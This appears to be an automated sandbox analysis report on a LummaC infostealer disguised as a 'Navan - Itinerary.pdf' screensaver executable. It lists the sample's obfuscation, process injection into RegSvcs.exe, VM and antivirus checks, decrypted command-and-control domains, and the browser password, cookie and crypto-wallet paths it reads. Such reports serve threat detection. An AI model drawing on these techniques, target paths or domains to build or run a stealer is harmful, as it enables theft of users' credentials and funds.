Source: Navan - Itinerary.pdf.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Navan - Itinerary.pdf.scr.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Navan - Itinerary.pdf.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Code function: 0_2_00665860 push eax; ret 0_2_0066587E
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Code function: 0_2_0050C04B pushad ; ret 0_2_0050C054
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Code function: 0_2_0050B03F pushad ; ret 0_2_0050B040
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Code function: 0_2_0050C8FE pushad ; ret 0_2_0050C8FF
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Code function: 0_2_0050B8EA pushad ; ret 0_2_0050B8EB
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Code function: 0_2_0050C195 pushad ; ret 0_2_0050C196
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Code function: 0_2_0050D1A9 pushad ; ret 0_2_0050D1AA
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Code function: 0_2_0050CA40 pushad ; ret 0_2_0050CA41
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Code function: 0_2_00507AF3 pushad ; ret 0_2_00507AF4
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Code function: 0_2_0050839E pushad ; ret 0_2_0050839F
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Code function: 0_2_00508C51 pushad ; ret 0_2_00508C52
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Code function: 0_2_005094FC pushad ; ret 0_2_005094FD
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Code function: 0_2_00508D93 pushad ; ret 0_2_00508D94
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Code function: 0_2_00509DA7 pushad ; ret 0_2_00509DA8
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Code function: 0_2_0050A652 pushad ; ret 0_2_0050A653
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Code function: 0_2_0050AEFD pushad ; ret 0_2_0050AEFE
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Code function: 0_2_00509EE9 pushad ; ret 0_2_00509EEA
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Code function: 0_2_0050A794 pushad ; ret 0_2_0050A795
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Code function: 0_2_0050B7A8 pushad ; ret 0_2_0050B7A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0043D810 push eax; mov dword ptr [esp], 707F7E0Dh 13_2_0043D812
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00443469 push ebp; iretd 13_2_0044346C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0044366E push 9F00CD97h; ret 13_2_004436B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0043AE30 push eax; mov dword ptr [esp], 1D1E1F10h 13_2_0043AE3E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0044171E push esp; ret 13_2_0044171F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_004477A5 push ebp; iretd 13_2_004477AA

Hooking and other Techniques for Hiding and Protection
barindex
Uses an obfuscated file name to hide its real file extension (double extension)
Source: Possible double extension: pdf.scr Static PE information: Navan - Itinerary.pdf.scr.exe
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe API coverage: 7.6 %
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Code function: 0_2_005D7458 GetSystemInfo, 0_2_005D7458
Source: Navan - Itinerary.pdf.scr.exe, 00000000.00000002.1638313764.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, Navan - Itinerary.pdf.scr.exe, 00000000.00000003.1637597165.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, Navan - Itinerary.pdf.scr.exe, 00000000.00000002.1638313764.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, Navan - Itinerary.pdf.scr.exe, 00000000.00000003.1637597165.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1636367348.00000000011D9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1636297807.000000000119C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0043C1F0 LdrInitializeThunk, 13_2_0043C1F0
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Code function: 0_2_006653A4 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_006653A4
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Code function: 0_2_006653A4 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_006653A4
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Code function: 0_2_006655FE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_006655FE

HIPS / PFW / Operating System Protection Evasion
barindex
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A Jump to behavior
LummaC encrypted strings found
Source: Navan - Itinerary.pdf.scr.exe, 00000000.00000003.1637419427.00000000038C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: rapeflowwj.lat
Source: Navan - Itinerary.pdf.scr.exe, 00000000.00000003.1637419427.00000000038C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: crosshuaht.lat
Source: Navan - Itinerary.pdf.scr.exe, 00000000.00000003.1637419427.00000000038C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: sustainskelet.lat
Source: Navan - Itinerary.pdf.scr.exe, 00000000.00000003.1637419427.00000000038C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: aspecteirs.lat
Source: Navan - Itinerary.pdf.scr.exe, 00000000.00000003.1637419427.00000000038C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: energyaffai.lat
Source: Navan - Itinerary.pdf.scr.exe, 00000000.00000003.1637419427.00000000038C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: necklacebudi.lat
Source: Navan - Itinerary.pdf.scr.exe, 00000000.00000003.1637419427.00000000038C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: discokeyus.lat
Source: Navan - Itinerary.pdf.scr.exe, 00000000.00000003.1637419427.00000000038C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: grannyejh.lat
Writes to foreign memory regions
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000 Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 443000 Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 452000 Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: F4B008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user~1\AppData\Local\Temp\NavanItinerary.pdf" Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Code function: 0_2_00665294 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00665294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: RegSvcs.exe, 0000000D.00000002.1636367348.000000000122A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1636367348.00000000011D9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1636297807.00000000011B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected LummaC Stealer
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: RegSvcs.exe, 0000000D.00000002.1636367348.00000000011CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum
Source: RegSvcs.exe, 0000000D.00000002.1636367348.00000000011CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectronCash
Source: RegSvcs.exe, 0000000D.00000002.1636367348.000000000122A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: y.jaxx\I
Source: RegSvcs.exe, 0000000D.00000002.1636367348.00000000011CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: RegSvcs.exe, 0000000D.00000002.1636367348.00000000011CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Ethereum
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
